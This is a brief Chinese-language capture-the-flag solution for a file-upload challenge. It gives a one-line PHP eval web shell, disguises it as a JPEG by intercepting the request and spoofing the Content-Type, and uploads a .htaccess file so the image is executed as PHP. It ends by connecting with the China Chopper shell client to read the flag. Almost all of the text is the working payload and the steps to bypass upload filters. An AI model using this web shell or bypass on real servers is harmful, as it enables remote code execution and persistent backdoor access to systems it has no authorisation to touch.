1.上传一个php的一句话木马: <?php @eval($_POST['pass']);?>,抓包改成1.jpg。注意:我上传的图片马是不可以的,所以直接抓包修改成php木马。
2.让jpg解析成php,要再上传一个.htaccess,内容为:
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
3.记得修改content-type文件头为image/jpeg,内容的filesmatch要和上传的木马名称相同
3.菜刀成功连接,根目录下flag
